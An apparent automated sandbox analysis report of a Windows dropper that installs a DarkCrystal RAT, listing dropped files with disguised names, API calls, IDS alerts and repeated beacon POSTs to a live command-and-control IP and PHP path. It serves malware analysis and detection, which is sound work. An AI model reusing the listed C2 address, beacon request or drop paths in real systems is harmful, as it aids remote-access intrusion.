                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeDirectory created: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeDirectory created: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\e226a7d7102d53Jump to behavior
                                    Source: 7vP2IvNXqx.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 7vP2IvNXqx.exe
                                    Source: Binary string: System.Windows.Forms.pdb source: fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 00000016.00000002.1942135265.0000000000EA2000.00000004.00000020.00020000.00000000.sdmp
                                    Source: Binary string: KZll\System.pdb source: fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 0000000F.00000002.1883052954.000000001B550000.00000004.00000020.00020000.00000000.sdmp
                                    Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 00000039.00000002.2484543389.000000001B460000.00000004.00000020.00020000.00000000.sdmp
                                    Source: Binary string: em.pdb source: fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 00000025.00000002.2201826455.000000001B201000.00000004.00000020.00020000.00000000.sdmp
                                    Source: Binary string: System.pdb source: fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 00000039.00000002.2484543389.000000001B460000.00000004.00000020.00020000.00000000.sdmp
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeCode function: 0_2_002DA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_002DA69B
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeCode function: 0_2_002EC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_002EC220
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeFile opened: C:\Users\userJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeFile opened: C:\Users\user\AppDataJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeCode function: 4x nop then jmp 00007FFD9B8920B6h4_2_00007FFD9B880862
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeCode function: 4x nop then jmp 00007FFD9BAC20B6h9_2_00007FFD9BAB085C
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeCode function: 4x nop then jmp 00007FFD9BAC20B6h15_2_00007FFD9BAC1EAE
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeCode function: 4x nop then jmp 00007FFD9BAB20B6h22_2_00007FFD9BAA0862
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeCode function: 4x nop then jmp 00007FFD9BAB20B6h27_2_00007FFD9BAB1EAE
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeCode function: 4x nop then jmp 00007FFD9BAB20B6h32_2_00007FFD9BAB1EAE
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeCode function: 4x nop then jmp 00007FFD9BAC20B6h37_2_00007FFD9BAC1EAE
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeCode function: 4x nop then jmp 00007FFD9BAA20B6h42_2_00007FFD9BA90862
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeCode function: 4x nop then jmp 00007FFD9BAC20B6h47_2_00007FFD9BAC1EAE
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeCode function: 4x nop then jmp 00007FFD9BAC20B6h52_2_00007FFD9BAC1EAE
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeCode function: 4x nop then jmp 00007FFD9BAE20B6h57_2_00007FFD9BAD0862
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeCode function: 4x nop then jmp 00007FFD9BAA20B6h63_2_00007FFD9BAA1EAE

                                    Networking

                                    barindex
                                    Suricata IDS alerts for network traffic
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49740 -> 206.188.197.24:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49730 -> 206.188.197.24:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49738 -> 206.188.197.24:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49741 -> 206.188.197.24:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49827 -> 206.188.197.24:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49739 -> 206.188.197.24:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49737 -> 206.188.197.24:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49868 -> 206.188.197.24:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49743 -> 206.188.197.24:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49780 -> 206.188.197.24:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49907 -> 206.188.197.24:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49945 -> 206.188.197.24:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:50010 -> 206.188.197.24:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:50016 -> 206.188.197.24:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:50015 -> 206.188.197.24:80
                                    Uses ping.exe to check the status of other devices and networks
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: Joe Sandbox ViewASN Name: DEFENSE-NETUS DEFENSE-NETUS
                                    Source: global trafficHTTP traffic detected: POST /Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/Processdumpmulti/LinejsProcessauthFlowerTestLocal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 206.188.197.24Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/Processdumpmulti/LinejsProcessauthFlowerTestLocal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 206.188.197.24Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/Processdumpmulti/LinejsProcessauthFlowerTestLocal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 206.188.197.24Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/Processdumpmulti/LinejsProcessauthFlowerTestLocal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 206.188.197.24Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/Processdumpmulti/LinejsProcessauthFlowerTestLocal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 206.188.197.24Content-Length: 336Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/Processdumpmulti/LinejsProcessauthFlowerTestLocal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 206.188.197.24Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/Processdumpmulti/LinejsProcessauthFlowerTestLocal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 206.188.197.24Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/Processdumpmulti/LinejsProcessauthFlowerTestLocal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 206.188.197.24Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/Processdumpmulti/LinejsProcessauthFlowerTestLocal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 206.188.197.24Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/Processdumpmulti/LinejsProcessauthFlowerTestLocal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 206.188.197.24Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/Processdumpmulti/LinejsProcessauthFlowerTestLocal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 206.188.197.24Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/Processdumpmulti/LinejsProcessauthFlowerTestLocal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 206.188.197.24Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/Processdumpmulti/LinejsProcessauthFlowerTestLocal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 206.188.197.24Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/Processdumpmulti/LinejsProcessauthFlowerTestLocal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 206.188.197.24Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/Processdumpmulti/LinejsProcessauthFlowerTestLocal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 206.188.197.24Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                                    Source: unknownTCP traffic detected without corresponding DNS query: 206.188.197.24
                                    Source: unknownTCP traffic detected without corresponding DNS query: 206.188.197.24
                                    Source: unknownTCP traffic detected without corresponding DNS query: 206.188.197.24
                                    Source: unknownTCP traffic detected without corresponding DNS query: 206.188.197.24
                                    Source: unknownTCP traffic detected without corresponding DNS query: 206.188.197.24
                                    Source: unknownTCP traffic detected without corresponding DNS query: 206.188.197.24
                                    Source: unknownTCP traffic detected without corresponding DNS query: 206.188.197.24
                                    Source: unknownTCP traffic detected without corresponding DNS query: 206.188.197.24
                                    Source: unknownTCP traffic detected without corresponding DNS query: 206.188.197.24
                                    Source: unknownTCP traffic detected without corresponding DNS query: 206.188.197.24
                                    Source: unknownTCP traffic detected without corresponding DNS query: 206.188.197.24
                                    Source: unknownTCP traffic detected without corresponding DNS query: 206.188.197.24
                                    Source: unknownTCP traffic detected without corresponding DNS query: 206.188.197.24
                                    Source: unknownTCP traffic detected without corresponding DNS query: 206.188.197.24
                                    Source: unknownTCP traffic detected without corresponding DNS query: 206.188.197.24
                                    Source: unknownTCP traffic detected without corresponding DNS query: 206.188.197.24
                                    Source: unknownTCP traffic detected without corresponding DNS query: 206.188.197.24
                                    Source: unknownTCP traffic detected without corresponding DNS query: 206.188.197.24
                                    Source: unknownTCP traffic detected without corresponding DNS query: 206.188.197.24
                                    Source: unknownTCP traffic detected without corresponding DNS query: 206.188.197.24
                                    Source: unknownTCP traffic detected without corresponding DNS query: 206.188.197.24
                                    Source: unknownTCP traffic detected without corresponding DNS query: 206.188.197.24
                                    Source: unknownTCP traffic detected without corresponding DNS query: 206.188.197.24
                                    Source: unknownTCP traffic detected without corresponding DNS query: 206.188.197.24
                                    Source: unknownTCP traffic detected without corresponding DNS query: 206.188.197.24
                                    Source: unknownTCP traffic detected without corresponding DNS query: 206.188.197.24
                                    Source: unknownTCP traffic detected without corresponding DNS query: 206.188.197.24
                                    Source: unknownTCP traffic detected without corresponding DNS query: 206.188.197.24
                                    Source: unknownTCP traffic detected without corresponding DNS query: 206.188.197.24
                                    Source: unknownTCP traffic detected without corresponding DNS query: 206.188.197.24
                                    Source: unknownTCP traffic detected without corresponding DNS query: 206.188.197.24
                                    Source: unknownTCP traffic detected without corresponding DNS query: 206.188.197.24
                                    Source: unknownTCP traffic detected without corresponding DNS query: 206.188.197.24
                                    Source: unknownTCP traffic detected without corresponding DNS query: 206.188.197.24
                                    Source: unknownTCP traffic detected without corresponding DNS query: 206.188.197.24
                                    Source: unknownTCP traffic detected without corresponding DNS query: 206.188.197.24
                                    Source: unknownTCP traffic detected without corresponding DNS query: 206.188.197.24
                                    Source: unknownTCP traffic detected without corresponding DNS query: 206.188.197.24
                                    Source: unknownTCP traffic detected without corresponding DNS query: 206.188.197.24
                                    Source: unknownTCP traffic detected without corresponding DNS query: 206.188.197.24
                                    Source: unknownTCP traffic detected without corresponding DNS query: 206.188.197.24
                                    Source: unknownTCP traffic detected without corresponding DNS query: 206.188.197.24
                                    Source: unknownTCP traffic detected without corresponding DNS query: 206.188.197.24
                                    Source: unknownTCP traffic detected without corresponding DNS query: 206.188.197.24
                                    Source: unknownTCP traffic detected without corresponding DNS query: 206.188.197.24
                                    Source: unknownTCP traffic detected without corresponding DNS query: 206.188.197.24
                                    Source: unknownTCP traffic detected without corresponding DNS query: 206.188.197.24
                                    Source: unknownTCP traffic detected without corresponding DNS query: 206.188.197.24
                                    Source: unknownTCP traffic detected without corresponding DNS query: 206.188.197.24
                                    Source: unknownTCP traffic detected without corresponding DNS query: 206.188.197.24
                                    Source: unknownHTTP traffic detected: POST /Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/Processdumpmulti/LinejsProcessauthFlowerTestLocal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 206.188.197.24Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0 (Ubuntu)Date: Fri, 03 Jan 2025 17:32:05 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html>
                                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0 (Ubuntu)Date: Fri, 03 Jan 2025 17:32:16 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0 (Ubuntu)Date: Fri, 03 Jan 2025 17:32:23 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html>
                                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0 (Ubuntu)Date: Fri, 03 Jan 2025 17:32:29 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html>
                                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0 (Ubuntu)Date: Fri, 03 Jan 2025 17:32:36 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
